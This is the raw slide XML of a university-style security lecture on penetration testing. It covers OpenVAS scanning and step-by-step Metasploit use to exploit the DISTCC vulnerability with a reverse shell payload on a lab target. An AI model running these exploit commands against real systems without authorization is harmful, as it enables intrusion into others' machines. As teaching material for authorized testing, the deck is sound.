          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5052427" y="2319945"/>
            <a:ext cx="2925345" cy="30753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577" y="2996952"/>
            <a:ext cx="4872915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dirty="0" err="1"/>
              <a:t>root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>apt-get install </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>openvas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577" y="3781632"/>
            <a:ext cx="4872915" cy="563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root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>openvas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>-setup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7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Weaponization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7543800" cy="40233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Other option is using of RAT (Remote Administrator Tool)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It take full control on a computer.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Even, if a user restarts the computer, the shell still will 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 RAT also can move between the computers.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645024"/>
            <a:ext cx="4032448" cy="247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0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to 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925921"/>
            <a:ext cx="7543800" cy="4023359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82" y="2414161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802" y="1903381"/>
            <a:ext cx="3390300" cy="238237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39752" y="4282239"/>
            <a:ext cx="2160240" cy="1648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DMZ</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Right Arrow 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="2920327">
            <a:off x="1671950" y="3547888"/>
            <a:ext cx="805536" cy="489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ight Arrow 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="7882868">
            <a:off x="4475121" y="3706041"/>
            <a:ext cx="805536" cy="489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708" y="2492896"/>
            <a:ext cx="494488" cy="4944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615" y="3039848"/>
            <a:ext cx="494488" cy="4944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433" y="3287092"/>
            <a:ext cx="494488" cy="4944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410" y="4792840"/>
            <a:ext cx="914400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376215" y="4445537"/>
            <a:ext cx="790790" cy="3708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Server</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Right Arrow 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="19348191">
            <a:off x="4520257" y="4548790"/>
            <a:ext cx="1512725" cy="460767"/>
          </a:xfrm>
          <a:prstGeom prst="rightArrow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TextBox 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2902405" y="3819339"/>
            <a:ext cx="790790" cy="3708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WAN</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6519825" y="1774324"/>
            <a:ext cx="790790" cy="3708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LAN</a:t>
            </a:r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519" y="2618496"/>
            <a:ext cx="465584" cy="4655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65022" y="3505432"/>
            <a:ext cx="20924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Target Alice</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="899592" y="1984593"/>
            <a:ext cx="790790" cy="3708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Eve</a:t>
            </a:r>
            <a:endParaRPr lang="he-I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7" y="2435754"/>
            <a:ext cx="735451" cy="73545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996" y="2386282"/>
            <a:ext cx="1305038" cy="669919"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Up-Down Arrow 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="3129528" y="1290503"/>
            <a:ext cx="436672" cy="273630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6902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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Framework –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open source </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>project that provides a public resource for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>researching security vulnerabilities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framework that allows a network administrator to break into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>his own network</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to identify security risks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framework that allows pen-testers to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>exploits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767451"/>
            <a:ext cx="3702050" cy="218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8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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Framework – Getting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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> uses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>PostgreSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> as its database so it needs to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>launched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To </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>start the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Kali PostgreSQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>service type the following command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can verify that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>PostgreSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is running by checking that port </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>5432</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is listening using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>netstat</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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With PostgreSQL up and running, we next need to initialize the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Framework PostgreSQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>database using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> command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767451"/>
            <a:ext cx="3702050" cy="21803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8429" y="3212976"/>
            <a:ext cx="4267851" cy="358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root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:~# service </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>postgresql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> start</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258428" y="5798081"/>
            <a:ext cx="4267851" cy="358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root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msfdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Framework – Getting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Now that the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>PostgreSQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> service is up and running and the database is initialized, you can launch </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and verify database connectivity with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>db_status</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command as shown below.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following command will show the exploits exists in the DB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767451"/>
            <a:ext cx="3702050" cy="21803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8429" y="3919186"/>
            <a:ext cx="4267851" cy="805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root@kali</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>:~# </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>db_status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58428" y="5527571"/>
            <a:ext cx="4267851" cy="402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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>show exploits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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Framework – Basic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can also search for an exploit using the search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>command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select an exploit you can use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>command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767451"/>
            <a:ext cx="3702050" cy="21803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4476" y="2520163"/>
            <a:ext cx="4267851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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>search </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&lt;key-word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54476" y="3756546"/>
            <a:ext cx="4267851" cy="6805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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>use exploit/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>misc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>distcc_exec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44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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Framework – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Selecting a payload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After selecting the exploit we need to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>an appropriate payload (the code that runs after we exploits the vulnerability)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most of the cases the payload is uses for opening a shell to the target machine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listing the compatible payloads to the selected exploit we use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>show payloads </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>command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767451"/>
            <a:ext cx="3702050" cy="21803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9512" y="5157192"/>
            <a:ext cx="4267851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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>show payloads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32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payloads for the DISTCC exploit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Picture Placeholder 8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45" t="15270" r="956"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="764704"/>
            <a:ext cx="914400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1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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Framework </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>–payload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As you may notice there </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>are two common types of shells</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Bind shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> - a bind shell opens up a new service on the target machine, and requires the attacker to connect to it in order to get a session</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Reverse shell - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a reverse shell (a.k.a. connect-back) is the exact opposite, it requires the attacker to set up a listener first, the target machine acts as a client connecting to that listener</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Q2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>- When we should consider using a reverse shell?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767451"/>
            <a:ext cx="3702050" cy="218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2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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Framework – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Configuring the Payload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can set the payload using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>set payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>command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Additionally, we need to configure the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>target</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>host</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> parameters:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>RHOST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– the target IP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>RPORT – the Port of the vulnerable application in the target machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LHOST – the IP for the connection back address in reverse payloads (Your IP)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>LPORT – your listener port (generally 4444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767451"/>
            <a:ext cx="3702050" cy="21803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8429" y="2492896"/>
            <a:ext cx="4267851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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; set payload /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/reverse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58428" y="5649343"/>
            <a:ext cx="4267851" cy="65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msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &gt; set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>LHOST 10.0.0.8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> =&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>10.0.0.8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69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7543800" cy="40233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In the last decade, the number of cyber attacks increases gradually.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57" y="2872864"/>
            <a:ext cx="3941015" cy="2628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298" y="2850552"/>
            <a:ext cx="2847065" cy="284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Metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Framework – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Running the exploit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run the exploit we use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>run/exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> command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Successful run of an exploit will open a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> shell</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr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2767451"/>
            <a:ext cx="3702050" cy="218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9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Armitage Framework </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Configuring the Payload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52371"/>
            <a:ext cx="72866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7543800" cy="40233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These attacks can cause:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Losses </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of intellectual assets</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Confidential business information sensitive business data, which can include stock market </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>manipulation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Damage to reputation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cybercrimes that may end up costing hundreds of millions of dollar every year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149080"/>
            <a:ext cx="3384696" cy="22161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829" y="3954640"/>
            <a:ext cx="28670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8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7543800" cy="40233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Therefore, organizations which care about their assets and reputation wish </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to preempt a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cure to such attacks.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As a result, they hire penetration testers that their goal is to penetrate into the organization and collect important assets.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573016"/>
            <a:ext cx="64198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2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7543800" cy="40233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Other options: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Analyze vulnerabilities in case of working with new servers.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Attempt to reach to DOS or to change something that will cause troubles.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9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Penetration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7543800" cy="40233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There are three types of penetration testing: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Black to Red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Red to Red no user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Red to Red with user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299988"/>
            <a:ext cx="4283968" cy="26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6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49750</TotalTime>
  <Words>1675</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>405</Paragraphs>
  <Slides>51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Arial Black</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>Mangal</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>Wingdings</vt:lpstr>
      <vt:lpstr>Theme1</vt:lpstr>
      <vt:lpstr>Office Theme</vt:lpstr>
      <vt:lpstr>Retrospect</vt:lpstr>
      <vt:lpstr>Computer &amp; Information Security</vt:lpstr>
      <vt:lpstr>Environment Setup</vt:lpstr>
      <vt:lpstr>OpenVAS – Getting Stated</vt:lpstr>
      <vt:lpstr>OpenVAS – Getting Stated</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Introduction</vt:lpstr>
      <vt:lpstr>Penetration Testing</vt:lpstr>
      <vt:lpstr>Use Case</vt:lpstr>
      <vt:lpstr>Use Case</vt:lpstr>
      <vt:lpstr>Use Case</vt:lpstr>
      <vt:lpstr>DMZ</vt:lpstr>
      <vt:lpstr>DMZ</vt:lpstr>
      <vt:lpstr>DMZ</vt:lpstr>
      <vt:lpstr>Black to Red</vt:lpstr>
      <vt:lpstr>Red to Red (no user)</vt:lpstr>
      <vt:lpstr>Red to Red (with user)</vt:lpstr>
      <vt:lpstr>OpenVAS – Overview</vt:lpstr>
      <vt:lpstr>Environment Setup</vt:lpstr>
      <vt:lpstr>OpenVAS – Getting Stated</vt:lpstr>
      <vt:lpstr>OpenVAS – Getting Stated</vt:lpstr>
      <vt:lpstr>OpenVAS – Getting Stated</vt:lpstr>
      <vt:lpstr>OpenVAS – Getting Stated</vt:lpstr>
      <vt:lpstr>OpenVAS – Getting Stated</vt:lpstr>
      <vt:lpstr>OpenVAS – Getting Stated</vt:lpstr>
      <vt:lpstr>OpenVAS – Getting Stated</vt:lpstr>
      <vt:lpstr>OpenVAS – Getting Stated</vt:lpstr>
      <vt:lpstr>After doing so, point your browser to https://127.0.0.1:9392</vt:lpstr>
      <vt:lpstr>OpenVAS – Getting Stated</vt:lpstr>
      <vt:lpstr>OpenVAS – Quick Start</vt:lpstr>
      <vt:lpstr>OpenVAS – Quick Start</vt:lpstr>
      <vt:lpstr>You can click the status-bar for revealing the scan details</vt:lpstr>
      <vt:lpstr>List of vulnerabilities found on the vulnerable machine</vt:lpstr>
      <vt:lpstr>DISTCC vulnerability details </vt:lpstr>
      <vt:lpstr>How can we exploit the DISTCC vulnerability?</vt:lpstr>
      <vt:lpstr>Black to Red</vt:lpstr>
      <vt:lpstr>Metasploit Usage</vt:lpstr>
      <vt:lpstr>What is a payload?</vt:lpstr>
      <vt:lpstr>Weaponization</vt:lpstr>
      <vt:lpstr>Black to Red</vt:lpstr>
      <vt:lpstr>Metasploit Framework – Overview</vt:lpstr>
      <vt:lpstr>Metasploit Framework – Getting Started</vt:lpstr>
      <vt:lpstr>Metasploit Framework – Getting Started</vt:lpstr>
      <vt:lpstr>Metasploit Framework – Basic commands</vt:lpstr>
      <vt:lpstr>Metasploit Framework – Selecting a payload</vt:lpstr>
      <vt:lpstr>List of payloads for the DISTCC exploit</vt:lpstr>
      <vt:lpstr>Metasploit Framework –payload types</vt:lpstr>
      <vt:lpstr>Metasploit Framework – Configuring the Payload</vt:lpstr>
      <vt:lpstr>Metasploit Framework – Running the exploit</vt:lpstr>
      <vt:lpstr>Armitage Framework – Configuring the Payload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</dc:title>
  <dc:creator>Eitan Menahem</dc:creator>
  <cp:lastModifiedBy>User</cp:lastModifiedBy>
  <cp:revision>818</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2009-05-03T10:46:20Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2019-06-15T13:23:57Z</dcterms:modified>
</cp:coreProperties>
</file>